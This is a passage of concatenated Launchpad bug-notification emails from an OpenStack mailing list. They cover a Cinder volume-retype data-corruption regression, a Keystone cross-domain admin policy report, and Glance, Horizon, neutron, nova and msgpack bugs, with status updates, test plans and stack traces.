However, the watcher does not get transferred, so nobody is accessing the volume after it has been transferred. ```sh [ceph: root@mon0 /]# rbd ls volumes volume-81cfbafc-4fbb-41b0-abcb-8ec7359d0bf9 [ceph: root@mon0 /]# rbd status volumes/volume-81cfbafc-4fbb-41b0-abcb-8ec7359d0bf9 Watchers: none ``` Taking a look at the libvirt XML of the instance in question, one can see that the `rbd` volume path does not change after the retyping is completed. Therefore, if the instance is restarted nova will not be able to find its volume preventing an instance start. Pre retype ```xml [...] [...] ``` Post retype (no change) ```xml [...] [...] ``` ### Possible cause While looking through the code that is responsible for the volume retype we found a function `swap_volume` volume which by our understanding should be responsible for fixing the association above. As we understand cinder should use an internal API path to let nova perform this action. This doesn't seem to happen. (`_swap_
[Yahoo-eng-team] [Bug 2019190] Re: [SRU][RBD] Retyping of in-use boot volumes renders instances unusable (possible data corruption)
** Changed in: cinder (Ubuntu Mantic) Status: New => In Progress ** Changed in: cloud-archive/caracal Status: New => Fix Released ** Changed in: cloud-archive/bobcat Status: New => In Progress -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Compute (nova). https://bugs.launchpad.net/bugs/2019190 Title: [SRU][RBD] Retyping of in-use boot volumes renders instances unusable (possible data corruption) Status in Cinder: New Status in Cinder wallaby series: New Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive antelope series: New Status in Ubuntu Cloud Archive bobcat series: In Progress Status in Ubuntu Cloud Archive caracal series: Fix Released Status in Ubuntu Cloud Archive yoga series: New Status in Ubuntu Cloud Archive zed series: New Status in OpenStack Compute (nova): Invalid Status in cinder package in Ubuntu: Fix Released Status in cinder source package in Jammy: New Status in cinder source package in Lunar: New Status in cinder source package in Mantic: In Progress Status in cinder source package in Noble: Fix Released Bug description: [Impact] See bug description for full details but short summary is that a patch landed in Wallaby release that introduced a regression whereby retyping an in-use volume leaves the attached volume in an inconsistent state with potential for data corruption. Result is that a vm does not receive updated connection_info from Cinder and will keep pointing to the old volume, even after reboot. [Test Plan] * Deploy Openstack with two Cinder RBD storage backends (different pools) * Create two volume types * Boot a vm from volume: openstack server create --wait --image jammy --flavor m1.small --key-name testkey --nic net-id=8c74f1ef-9231-46f4-a492-eccdb7943ecd testvm --boot-from-volume 10 * Retype the volume to type B: openstack volume set --type typeB --retype-policy on-demand * Go to compute host running vm and check that the vm is now copying data to the new location e.g. b68be47d-f526-4f98-a77b-a903bf8b6c65 which will eventually settle and change to: b68be47d-f526-4f98-a77b-a903bf8b6c65 * And lastly a reboot of the vm should be successfull. [Regression Potential] Given that the current state is potential data corruption and the patch will fix this by successfully refreshing connection info I do not see a regression potential. It is in fact fixing a regression. - While trying out the volume retype feature in cinder, we noticed that after an instance is rebooted it will not come back online and be stuck in an error state or if it comes back online, its filesystem is corrupted. ## Observations Say there are the two volume types `fast` (stored in ceph pool `volumes`) and `slow` (stored in ceph pool `volumes.hdd`). Before the retyping we can see that the volume for example is present in the `volumes.hdd` pool and has a watcher accessing the volume. ```sh [ceph: root@mon0 /]# rbd ls volumes.hdd volume-81cfbafc-4fbb-41b0-abcb-8ec7359d0bf9 [ceph: root@mon0 /]# rbd status volumes.hdd/volume-81cfbafc-4fbb-41b0-abcb-8ec7359d0bf9 Watchers: watcher=[2001:XX:XX:XX::10ad]:0/3914407456 client.365192 cookie=140370268803456 ``` Starting the retyping process using the migration policy `on-demand` for that volume either via the horizon dashboard or the CLI causes the volume to be correctly transferred to the `volumes` pool within the ceph cluster. However, the watcher does not get transferred, so nobody is accessing the volume after it has been transferred. ```sh [ceph: root@mon0 /]# rbd ls volumes volume-81cfbafc-4fbb-41b0-abcb-8ec7359d0bf9 [ceph: root@mon0 /]# rbd status volumes/volume-81cfbafc-4fbb-41b0-abcb-8ec7359d0bf9 Watchers: none ``` Taking a look at the libvirt XML of the instance in question, one can see that the `rbd` volume path does not change after the retyping is completed. Therefore, if the instance is restarted nova will not be able to find its volume preventing an instance start. Pre retype ```xml [...] [...] ``` Post retype (no change) ```xml [...] [...] ``` ### Possible cause While looking through the code that is responsible for the volume retype we found a function `swap_volume` volume which by our understanding should be responsible for fixing the association
[Yahoo-eng-team] [Bug 2019190] Re: [SRU][RBD] Retyping of in-use boot volumes renders instances unusable (possible data corruption)
Included in most recent snapshots for Caracal ** Changed in: cinder (Ubuntu Noble) Status: New => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Compute (nova). https://bugs.launchpad.net/bugs/2019190 Title: [SRU][RBD] Retyping of in-use boot volumes renders instances unusable (possible data corruption) Status in Cinder: New Status in Cinder wallaby series: New Status in Ubuntu Cloud Archive: New Status in Ubuntu Cloud Archive antelope series: New Status in Ubuntu Cloud Archive bobcat series: New Status in Ubuntu Cloud Archive caracal series: New Status in Ubuntu Cloud Archive yoga series: New Status in Ubuntu Cloud Archive zed series: New Status in OpenStack Compute (nova): Invalid Status in cinder package in Ubuntu: Fix Released Status in cinder source package in Jammy: New Status in cinder source package in Lunar: New Status in cinder source package in Mantic: New Status in cinder source package in Noble: Fix Released Bug description: [Impact] See bug description for full details but short summary is that a patch landed in Wallaby release that introduced a regression whereby retyping an in-use volume leaves the attached volume in an inconsistent state with potential for data corruption. Result is that a vm does not receive updated connection_info from Cinder and will keep pointing to the old volume, even after reboot. [Test Plan] * Deploy Openstack with two Cinder RBD storage backends (different pools) * Create two volume types * Boot a vm from volume: openstack server create --wait --image jammy --flavor m1.small --key-name testkey --nic net-id=8c74f1ef-9231-46f4-a492-eccdb7943ecd testvm --boot-from-volume 10 * Retype the volume to type B: openstack volume set --type typeB --retype-policy on-demand * Go to compute host running vm and check that the vm is now copying data to the new location e.g. b68be47d-f526-4f98-a77b-a903bf8b6c65 which will eventually settle and change to: b68be47d-f526-4f98-a77b-a903bf8b6c65 * And lastly a reboot of the vm should be successfull. [Regression Potential] Given that the current state is potential data corruption and the patch will fix this by successfully refreshing connection info I do not see a regression potential. It is in fact fixing a regression. - While trying out the volume retype feature in cinder, we noticed that after an instance is rebooted it will not come back online and be stuck in an error state or if it comes back online, its filesystem is corrupted. ## Observations Say there are the two volume types `fast` (stored in ceph pool `volumes`) and `slow` (stored in ceph pool `volumes.hdd`). Before the retyping we can see that the volume for example is present in the `volumes.hdd` pool and has a watcher accessing the volume. ```sh [ceph: root@mon0 /]# rbd ls volumes.hdd volume-81cfbafc-4fbb-41b0-abcb-8ec7359d0bf9 [ceph: root@mon0 /]# rbd status volumes.hdd/volume-81cfbafc-4fbb-41b0-abcb-8ec7359d0bf9 Watchers: watcher=[2001:XX:XX:XX::10ad]:0/3914407456 client.365192 cookie=140370268803456 ``` Starting the retyping process using the migration policy `on-demand` for that volume either via the horizon dashboard or the CLI causes the volume to be correctly transferred to the `volumes` pool within the ceph cluster. However, the watcher does not get transferred, so nobody is accessing the volume after it has been transferred. ```sh [ceph: root@mon0 /]# rbd ls volumes volume-81cfbafc-4fbb-41b0-abcb-8ec7359d0bf9 [ceph: root@mon0 /]# rbd status volumes/volume-81cfbafc-4fbb-41b0-abcb-8ec7359d0bf9 Watchers: none ``` Taking a look at the libvirt XML of the instance in question, one can see that the `rbd` volume path does not change after the retyping is completed. Therefore, if the instance is restarted nova will not be able to find its volume preventing an instance start. Pre retype ```xml [...] [...] ``` Post retype (no change) ```xml [...] [...] ``` ### Possible cause While looking through the code that is responsible for the volume retype we found a function `swap_volume` volume which by our understanding should be responsible for fixing the association above. As we understand cinder should use an internal API path to let nova perform this action. This doesn't seem to happen.
[Yahoo-eng-team] [Bug 2004031] Re: User with admin_required in a non cloud_admin domain/project can manage other domains with admin_required permissions
Please can you provide full details of your deployment; specifically which charms and channels you are using and on which base version of Ubuntu. ** Project changed: keystone => charm-keystone ** Changed in: charm-keystone Status: New => Incomplete -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Identity (keystone). https://bugs.launchpad.net/bugs/2004031 Title: User with admin_required in a non cloud_admin domain/project can manage other domains with admin_required permissions Status in OpenStack Keystone Charm: Incomplete Bug description: In a deployment of Openstack Yoga, I have the following policy.json configured in Keystone: https://paste.ubuntu.com/p/F2PMP857mG/. When I create a new domain, a project inside that domain, a user with the role:Admin, and I set the context for that user/project/domain for the CLI, I can perform actions like list and delete instances, images, networks and routers created in the cloud_admin domain domain_id:703118433996472d82713a3100b07432 and cloud_admin project project_id:16264684b58747cba04a98c128f5044f. To manage notifications about this bug go to: https://bugs.launchpad.net/charm-keystone/+bug/2004031/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
[Yahoo-eng-team] [Bug 1909581] Re: Install and configure for Red Hat Enterprise Linux and CentOS in horizon
** Also affects: horizon Importance: Undecided Status: New ** No longer affects: horizon (Ubuntu) -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Dashboard (Horizon). https://bugs.launchpad.net/bugs/1909581 Title: Install and configure for Red Hat Enterprise Linux and CentOS in horizon Status in OpenStack Dashboard (Horizon): New Bug description: /etc/openstack-dashboard/local_settings needs WEBROOT = '/dashboard/' --- Release: 18.6.2.dev8 on 2019-12-05 11:04:48 SHA: 7806d67529b7718cac6015677b60b9b52a4f8dd7 Source: https://opendev.org/openstack/horizon/src/doc/source/install/install-rdo.rst URL: https://docs.openstack.org/horizon/victoria/install/install-rdo.html To manage notifications about this bug go to: https://bugs.launchpad.net/horizon/+bug/1909581/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
[Yahoo-eng-team] [Bug 1928031] Re: neutron-ovn-metadata-agent AttributeError: 'MetadataProxyHandler' object has no attribute 'sb_idl'
** Changed in: openvswitch (Ubuntu) Status: New => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/1928031 Title: neutron-ovn-metadata-agent AttributeError: 'MetadataProxyHandler' object has no attribute 'sb_idl' Status in charm-ovn-chassis: Invalid Status in Ubuntu Cloud Archive: New Status in Ubuntu Cloud Archive ussuri series: New Status in Ubuntu Cloud Archive wallaby series: New Status in neutron: Fix Released Status in neutron package in Ubuntu: Fix Released Status in openvswitch package in Ubuntu: Fix Released Status in neutron source package in Focal: New Status in openvswitch source package in Focal: New Bug description: neutron-ovn-metadata-agent not able to handle any metadata requests from the instances. Scenario: * Initially there is some intermittent connectivity issues that are descirbed in LP #1907686   https://bugs.launchpad.net/charm-ovn-chassis/+bug/1907686/comments/9 * The fix for the above is available in python3-openvswitch package in ussuri-proposed pocket   Installed the fix on all neutron-server and compute and restarted neutron-ovn-metadata-agent one by one * neutron-ovn-metadata-agent on one of the compute nodes not able to handle any metadata requests after restart. ( Please note the problem happened with only one ovn-metadata agent and rest of the agents are good on other compute nodes, so this is some race condition in IDL) Stacktrace shows both the workers 69188/69189 timed out on OVNSB IDL connection and hence sb_idl is never initialized. Stacktrace of Attribute error: -- 2021-04-27 08:51:01.340 69188 ERROR neutron.agent.ovn.metadata.server Traceback (most recent call last): 2021-04-27 08:51:01.340 69188 ERROR neutron.agent.ovn.metadata.server File "/usr/lib/python3/dist-packages/neutron/agent/ovn/metadata/server.py", line 67, in __call__ 2021-04-27 08:51:01.340 69188 ERROR neutron.agent.ovn.metadata.server instance_id, project_id = self._get_instance_and_project_id(req) 2021-04-27 08:51:01.340 69188 ERROR neutron.agent.ovn.metadata.server File "/usr/lib/python3/dist-packages/neutron/agent/ovn/metadata/server.py", line 84, in _get_instance_and_project_id 2021-04-27 08:51:01.340 69188 ERROR neutron.agent.ovn.metadata.server ports = self.sb_idl.get_network_port_bindings_by_ip(network_id, 2021-04-27 08:51:01.340 69188 ERROR neutron.agent.ovn.metadata.server AttributeError: 'MetadataProxyHandler' object has no attribute 'sb_idl' 2021-04-27 08:51:01.340 69188 ERROR neutron.agent.ovn.metadata.server Stacktrace at the restart of neutron-ovn-metadata-agent process: 2021-04-15 22:27:03.803 69124 INFO neutron.common.config [-] /usr/bin/neutron-ovn-metadata-agent version 16.2.0 2021-04-15 22:27:03.832 69124 INFO ovsdbapp.backend.ovs_idl.vlog [-] tcp:127.0.0.1:6640: connecting... 2021-04-15 22:27:03.833 69124 INFO ovsdbapp.backend.ovs_idl.vlog [-] tcp:127.0.0.1:6640: connected 2021-04-15 22:27:03.949 69124 WARNING neutron.agent.ovn.metadata.agent [-] Can't read ovn-bridge external-id from OVSDB. Using br-int instead. 2021-04-15 22:27:03.950 69124 INFO oslo_service.service [-] Starting 2 workers 2021-04-15 22:27:03.985 69188 INFO ovsdbapp.backend.ovs_idl.vlog [-] ssl:10.216.241.118:6642: connecting... 2021-04-15 22:27:03.986 69189 INFO ovsdbapp.backend.ovs_idl.vlog [-] ssl:10.216.241.118:6642: connecting... 2021-04-15 22:27:04.005 69124 INFO ovsdbapp.backend.ovs_idl.vlog [-] ssl:10.216.241.118:6642: connecting... 2021-04-15 22:27:04.006 69188 INFO ovsdbapp.backend.ovs_idl.vlog [-] ssl:10.216.241.118:6642: connected 2021-04-15 22:27:04.033 69189 INFO ovsdbapp.backend.ovs_idl.vlog [-] ssl:10.216.241.118:6642: connected 2021-04-15 22:27:04.061 69124 INFO ovsdbapp.backend.ovs_idl.vlog [-] ssl:10.216.241.118:6642: connected 2021-04-15 22:27:06.129 69124 INFO oslo.privsep.daemon [-] Running privsep helper: ['sudo', '/usr/bin/neutron-rootwrap', '/etc/neutron/rootwrap.conf', 'privsep-helper', '--config-file', '/etc/neutron/neutron.conf', '--config-file', '/etc/neutron/neutron_ovn_metadata_agent.ini', '--privsep_context', 'neutron.privileged.default', '--privsep_sock_path', '/tmp/tmpgncr2rq7/privsep.sock'] 2021-04-15 22:27:06.757 69124 INFO oslo.privsep.daemon [-] Spawned new privsep daemon via rootwrap 2021-04-15 22:27:06.676 69211 INFO oslo.privsep.daemon [-] privsep daemon starting 2021-04-15 22:27:06.678 69211 INFO oslo.privsep.daemon [-] privsep process running with uid/gid: 0/0 2021-04-15 22:27:06.680 69211 INFO oslo.privsep.daemon [-] privsep process running with capabilities (eff/prm/inh): CAP_DAC_OVERRIDE|CAP_DAC_READ_SEARCH|CAP_NET_ADMIN|CAP_SYS_ADMIN|CAP_SYS_PTRACE/CAP_DAC_OVERRIDE|CAP_DAC_READ_SEARCH|CAP_NET_ADMIN|C
[Yahoo-eng-team] [Bug 1951261] Re: web-download doesn't work in proxied env
whitelisting and blacklist exists for the web-download importer but no proxy configuration. This feels like a feature that needs to go into glance rather than being mashed in by the charm in some way that kinda works/maybe works. ** Changed in: charm-glance Status: New => Incomplete ** Changed in: charm-glance Importance: Undecided => Low ** Also affects: glance Importance: Undecided Status: New ** Changed in: charm-glance Importance: Low => Wishlist -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to Glance. https://bugs.launchpad.net/bugs/1951261 Title: web-download doesn't work in proxied env Status in OpenStack Glance Charm: Incomplete Status in Glance: New Bug description: I'm trying to import an image via the web-download method[0][1]. When kicking off the import process I'm getting this in the glance- api.log 2021-11-17 12:50:20.586 24884 ERROR glance.async_.taskflow_executor Traceback (most recent call last): 2021-11-17 12:50:20.586 24884 ERROR glance.async_.taskflow_executor File "/usr/lib/python3/dist-packages/taskflow/engines/action_engine/executor.py", line 53, in _execute_task 2021-11-17 12:50:20.586 24884 ERROR glance.async_.taskflow_executor result = task.execute(**arguments) 2021-11-17 12:50:20.586 24884 ERROR glance.async_.taskflow_executor File "/usr/lib/python3/dist-packages/glance/async_/flows/_internal_plugins/web_download.py", line 116, in execute 2021-11-17 12:50:20.586 24884 ERROR glance.async_.taskflow_executor LOG.error("Task %(task_id)s failed with exception %(error)s", 2021-11-17 12:50:20.586 24884 ERROR glance.async_.taskflow_executor File "/usr/lib/python3/dist-packages/oslo_utils/excutils.py", line 220, in __exit__ 2021-11-17 12:50:20.586 24884 ERROR glance.async_.taskflow_executor self.force_reraise() 2021-11-17 12:50:20.586 24884 ERROR glance.async_.taskflow_executor File "/usr/lib/python3/dist-packages/oslo_utils/excutils.py", line 196, in force_reraise 2021-11-17 12:50:20.586 24884 ERROR glance.async_.taskflow_executor six.reraise(self.type_, self.value, self.tb) 2021-11-17 12:50:20.586 24884 ERROR glance.async_.taskflow_executor File "/usr/lib/python3/dist-packages/six.py", line 703, in reraise 2021-11-17 12:50:20.586 24884 ERROR glance.async_.taskflow_executor raise value 2021-11-17 12:50:20.586 24884 ERROR glance.async_.taskflow_executor File "/usr/lib/python3/dist-packages/glance/async_/flows/_internal_plugins/web_download.py", line 113, in execute 2021-11-17 12:50:20.586 24884 ERROR glance.async_.taskflow_executor data = script_utils.get_image_data_iter(self.uri) 2021-11-17 12:50:20.586 24884 ERROR glance.async_.taskflow_executor File "/usr/lib/python3/dist-packages/glance/common/scripts/utils.py", line 142, in get_image_data_iter 2021-11-17 12:50:20.586 24884 ERROR glance.async_.taskflow_executor return urllib.request.urlopen(uri) 2021-11-17 12:50:20.586 24884 ERROR glance.async_.taskflow_executor File "/usr/lib/python3.8/urllib/request.py", line 222, in urlopen 2021-11-17 12:50:20.586 24884 ERROR glance.async_.taskflow_executor return opener.open(url, data, timeout) 2021-11-17 12:50:20.586 24884 ERROR glance.async_.taskflow_executor File "/usr/lib/python3.8/urllib/request.py", line 525, in open 2021-11-17 12:50:20.586 24884 ERROR glance.async_.taskflow_executor response = self._open(req, data) 2021-11-17 12:50:20.586 24884 ERROR glance.async_.taskflow_executor File "/usr/lib/python3.8/urllib/request.py", line 542, in _open 2021-11-17 12:50:20.586 24884 ERROR glance.async_.taskflow_executor result = self._call_chain(self.handle_open, protocol, protocol + 2021-11-17 12:50:20.586 24884 ERROR glance.async_.taskflow_executor File "/usr/lib/python3.8/urllib/request.py", line 502, in _call_chain 2021-11-17 12:50:20.586 24884 ERROR glance.async_.taskflow_executor result = func(*args) 2021-11-17 12:50:20.586 24884 ERROR glance.async_.taskflow_executor File "/usr/lib/python3.8/urllib/request.py", line 1383, in http_open 2021-11-17 12:50:20.586 24884 ERROR glance.async_.taskflow_executor return self.do_open(http.client.HTTPConnection, req) 2021-11-17 12:50:20.586 24884 ERROR glance.async_.taskflow_executor File "/usr/lib/python3.8/urllib/request.py", line 1357, in do_open 2021-11-17 12:50:20.586 24884 ERROR glance.async_.taskflow_executor raise URLError(err) 2021-11-17 12:50:20.586 24884 ERROR glance.async_.taskflow_executor urllib.error.URLError: 2021-11-17 12:50:20.586 24884 ERROR glance.async_.taskflow_executor The model is situated behind a http proxy. I have set this model-config: juju model-config | grep http-proxy apt-http-proxycontroller http://foo.proxy.host:3128 http-proxydefault "" juju-http-proxy controller http://foo.p
[Yahoo-eng-team] [Bug 1892361] Re: SRIOV instance gets type-PF interface, libvirt kvm fails
** Changed in: nova/stein Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Compute (nova). https://bugs.launchpad.net/bugs/1892361 Title: SRIOV instance gets type-PF interface, libvirt kvm fails Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive queens series: Fix Released Status in Ubuntu Cloud Archive rocky series: Fix Released Status in Ubuntu Cloud Archive stein series: Fix Released Status in Ubuntu Cloud Archive train series: Fix Released Status in Ubuntu Cloud Archive ussuri series: Fix Released Status in Ubuntu Cloud Archive victoria series: Fix Released Status in OpenStack Compute (nova): Fix Released Status in OpenStack Compute (nova) queens series: Fix Released Status in OpenStack Compute (nova) rocky series: Fix Released Status in OpenStack Compute (nova) stein series: Fix Released Status in OpenStack Compute (nova) train series: Fix Released Status in OpenStack Compute (nova) ussuri series: Fix Released Status in OpenStack Compute (nova) victoria series: Fix Released Status in nova package in Ubuntu: Fix Released Status in nova source package in Bionic: Fix Released Status in nova source package in Focal: Fix Released Status in nova source package in Groovy: Fix Released Status in nova source package in Hirsute: Fix Released Bug description: When spawning an SR-IOV enabled instance on a newly deployed host, nova attempts to spawn it with an type-PF pci device. This fails with the below stack trace. After restarting neutron-sriov-agent and nova-compute services on the compute node and spawning an SR-IOV instance again, a type-VF pci device is selected, and instance spawning succeeds. Stack trace: 2020-08-20 08:29:09.558 7624 DEBUG oslo_messaging._drivers.amqpdriver [-] received reply msg_id: 6db8011e6ecd4fd0aaa53c8f89f08b1b __call__ /usr/lib/python2.7/dist-packages/oslo_messaging/_drivers/amqpdriver.py:400 2020-08-20 08:29:09.561 7624 ERROR nova.compute.manager [req-e3e49d07-24c6-4c62-916e-f830f70983a2 ddcfb3640535428798aa3c8545362bd4 dd99e7950a5b46b5b924ccd1720b6257 - 015e4fd7db304665ab5378caa691bb8b 015e4fd7db304665ab5378caa691bb8b] [insta nce: 9498ea75-fe88-4020-9a9e-f4c437c6de11] Instance failed to spawn: libvirtError: unsupported configuration: Interface type hostdev is currently supported on SR-IOV Virtual Functions only 2020-08-20 08:29:09.561 7624 ERROR nova.compute.manager [instance: 9498ea75-fe88-4020-9a9e-f4c437c6de11] Traceback (most recent call last): 2020-08-20 08:29:09.561 7624 ERROR nova.compute.manager [instance: 9498ea75-fe88-4020-9a9e-f4c437c6de11] File "/usr/lib/python2.7/dist-packages/nova/compute/manager.py", line 2274, in _build_resources 2020-08-20 08:29:09.561 7624 ERROR nova.compute.manager [instance: 9498ea75-fe88-4020-9a9e-f4c437c6de11] yield resources 2020-08-20 08:29:09.561 7624 ERROR nova.compute.manager [instance: 9498ea75-fe88-4020-9a9e-f4c437c6de11] File "/usr/lib/python2.7/dist-packages/nova/compute/manager.py", line 2054, in _build_and_run_instance 2020-08-20 08:29:09.561 7624 ERROR nova.compute.manager [instance: 9498ea75-fe88-4020-9a9e-f4c437c6de11] block_device_info=block_device_info) 2020-08-20 08:29:09.561 7624 ERROR nova.compute.manager [instance: 9498ea75-fe88-4020-9a9e-f4c437c6de11] File "/usr/lib/python2.7/dist-packages/nova/virt/libvirt/driver.py", line 3147, in spawn 2020-08-20 08:29:09.561 7624 ERROR nova.compute.manager [instance: 9498ea75-fe88-4020-9a9e-f4c437c6de11] destroy_disks_on_failure=True) 2020-08-20 08:29:09.561 7624 ERROR nova.compute.manager [instance: 9498ea75-fe88-4020-9a9e-f4c437c6de11] File "/usr/lib/python2.7/dist-packages/nova/virt/libvirt/driver.py", line 5651, in _create_domain_and_network 2020-08-20 08:29:09.561 7624 ERROR nova.compute.manager [instance: 9498ea75-fe88-4020-9a9e-f4c437c6de11] destroy_disks_on_failure) 2020-08-20 08:29:09.561 7624 ERROR nova.compute.manager [instance: 9498ea75-fe88-4020-9a9e-f4c437c6de11] File "/usr/lib/python2.7/dist-packages/oslo_utils/excutils.py", line 220, in __exit__ 2020-08-20 08:29:09.561 7624 ERROR nova.compute.manager [instance: 9498ea75-fe88-4020-9a9e-f4c437c6de11] self.force_reraise() 2020-08-20 08:29:09.561 7624 ERROR nova.compute.manager [instance: 9498ea75-fe88-4020-9a9e-f4c437c6de11] File "/usr/lib/python2.7/dist-packages/oslo_utils/excutils.py", line 196, in force_reraise 2020-08-20 08:29:09.561 7624 ERROR nova.compute.manager [instance: 9498ea75-fe88-4020-9a9e-f4c437c6de11] six.reraise(self.type_, self.value, self.tb) 2020-08-20 08:29:09.561 7624 ERROR nova.compute.manager [instance: 9498ea75-fe88-4020-9a9e-f4c437c6de11] File "/usr/lib/python2.7/dist-packages/nova/virt/libvirt/driver.py", line 5620, in _create_domain_and_network 2020-08-20 08:29:09.561 7624 ERROR nova.
[Yahoo-eng-team] [Bug 1937261] Re: python3-msgpack package broken due to outdated cython
python-msgpack promoted to Ussuri updates pocket. ** Changed in: cloud-archive/ussuri Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/1937261 Title: python3-msgpack package broken due to outdated cython Status in Ubuntu Cloud Archive: Invalid Status in Ubuntu Cloud Archive ussuri series: Fix Released Status in neutron: New Status in oslo.privsep: New Bug description: After a successful upgrade of the control-plance from Train -> Ussuri on Ubuntu Bionic, we upgraded a first compute / network node and immediately ran into issues with Neutron: We noticed that Neutron is extremely slow in setting up and wiring the network ports, so slow it would never finish and throw all sorts of errors (RabbitMQ connection timeouts, full sync required, ...) We were now able to reproduce the error on our Ussuri DEV cloud as well: 1) First we used strace - -p $PID_OF_NEUTRON_LINUXBRIDGE_AGENT and noticed that the data exchange on the unix socket between the rootwrap-daemon and the main process is really really slow. One could actually read line by line the read calls to the fd of the socket. 2) We then (after adding lots of log lines and other intensive manual debugging) used py-spy (https://github.com/benfred/py-spy) via "py-spy top --pid $PID" on the running neutron-linuxbridge-agent process and noticed all the CPU time (process was at 100% most of the time) was spent in msgpack/fallback.py 3) Since the issue was not observed in TRAIN we compared the msgpack version used and noticed that TRAIN was using version 0.5.6 while Ussuri upgraded this dependency to 0.6.2. 4) We then downgraded to version 0.5.6 of msgpack (ignoring the actual dependencies) --- cut --- apt policy python3-msgpack python3-msgpack:   Installed: 0.6.2-1~cloud0   Candidate: 0.6.2-1~cloud0   Version table:  *** 0.6.2-1~cloud0 500 500 http://ubuntu-cloud.archive.canonical.com/ubuntu bionic-updates/ussuri/main amd64 Packages  0.5.6-1 500 500 http://de.archive.ubuntu.com/ubuntu bionic/main amd64 Packages 100 /var/lib/dpkg/status --- cut --- vs. --- cut --- apt policy python3-msgpack python3-msgpack: Installed: 0.5.6-1 Candidate: 0.6.2-1~cloud0 Version table: 0.6.2-1~cloud0 500 500 http://ubuntu-cloud.archive.canonical.com/ubuntu bionic-updates/ussuri/main amd64 Packages *** 0.5.6-1 500 500 http://de.archive.ubuntu.com/ubuntu bionic/main amd64 Packages 100 /var/lib/dpkg/status --- cut --- and et voila: The Neutron-Linuxbridge-Agent worked just like before (building one port every few seconds) and all network ports eventually converged to ACTIVE. I could not yet spot which commit of msgpack changes (https://github.com/msgpack/msgpack-python/compare/0.5.6...v0.6.2) might have caused this issue, but I am really certain that this is a major issue for Ussuri on Ubuntu Bionic. There are "similar" issues with  * https://bugs.launchpad.net/oslo.privsep/+bug/1844822  * https://bugs.launchpad.net/oslo.privsep/+bug/1896734 both related to msgpack or the size of messages exchanged. To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/1937261/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
[Yahoo-eng-team] [Bug 1937261] Re: python3-msgpack package broken due to outdated cython
** Changed in: cloud-archive Status: New => Confirmed ** Also affects: cloud-archive/ussuri Importance: Undecided Status: New ** Changed in: cloud-archive Status: Confirmed => Invalid ** Changed in: cloud-archive/ussuri Status: New => Triaged ** Changed in: cloud-archive/ussuri Importance: Undecided => Medium ** No longer affects: python-msgpack (Ubuntu) ** No longer affects: python-oslo.privsep (Ubuntu) -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/1937261 Title: python3-msgpack package broken due to outdated cython Status in Ubuntu Cloud Archive: Invalid Status in Ubuntu Cloud Archive ussuri series: Triaged Status in neutron: New Status in oslo.privsep: New Bug description: After a successful upgrade of the control-plance from Train -> Ussuri on Ubuntu Bionic, we upgraded a first compute / network node and immediately ran into issues with Neutron: We noticed that Neutron is extremely slow in setting up and wiring the network ports, so slow it would never finish and throw all sorts of errors (RabbitMQ connection timeouts, full sync required, ...) We were now able to reproduce the error on our Ussuri DEV cloud as well: 1) First we used strace - -p $PID_OF_NEUTRON_LINUXBRIDGE_AGENT and noticed that the data exchange on the unix socket between the rootwrap-daemon and the main process is really really slow. One could actually read line by line the read calls to the fd of the socket. 2) We then (after adding lots of log lines and other intensive manual debugging) used py-spy (https://github.com/benfred/py-spy) via "py-spy top --pid $PID" on the running neutron-linuxbridge-agent process and noticed all the CPU time (process was at 100% most of the time) was spent in msgpack/fallback.py 3) Since the issue was not observed in TRAIN we compared the msgpack version used and noticed that TRAIN was using version 0.5.6 while Ussuri upgraded this dependency to 0.6.2. 4) We then downgraded to version 0.5.6 of msgpack (ignoring the actual dependencies) --- cut --- apt policy python3-msgpack python3-msgpack:   Installed: 0.6.2-1~cloud0   Candidate: 0.6.2-1~cloud0   Version table:  *** 0.6.2-1~cloud0 500 500 http://ubuntu-cloud.archive.canonical.com/ubuntu bionic-updates/ussuri/main amd64 Packages  0.5.6-1 500 500 http://de.archive.ubuntu.com/ubuntu bionic/main amd64 Packages 100 /var/lib/dpkg/status --- cut --- vs. --- cut --- apt policy python3-msgpack python3-msgpack: Installed: 0.5.6-1 Candidate: 0.6.2-1~cloud0 Version table: 0.6.2-1~cloud0 500 500 http://ubuntu-cloud.archive.canonical.com/ubuntu bionic-updates/ussuri/main amd64 Packages *** 0.5.6-1 500 500 http://de.archive.ubuntu.com/ubuntu bionic/main amd64 Packages 100 /var/lib/dpkg/status --- cut --- and et voila: The Neutron-Linuxbridge-Agent worked just like before (building one port every few seconds) and all network ports eventually converged to ACTIVE. I could not yet spot which commit of msgpack changes (https://github.com/msgpack/msgpack-python/compare/0.5.6...v0.6.2) might have caused this issue, but I am really certain that this is a major issue for Ussuri on Ubuntu Bionic. There are "similar" issues with  * https://bugs.launchpad.net/oslo.privsep/+bug/1844822  * https://bugs.launchpad.net/oslo.privsep/+bug/1896734 both related to msgpack or the size of messages exchanged. To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/1937261/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : 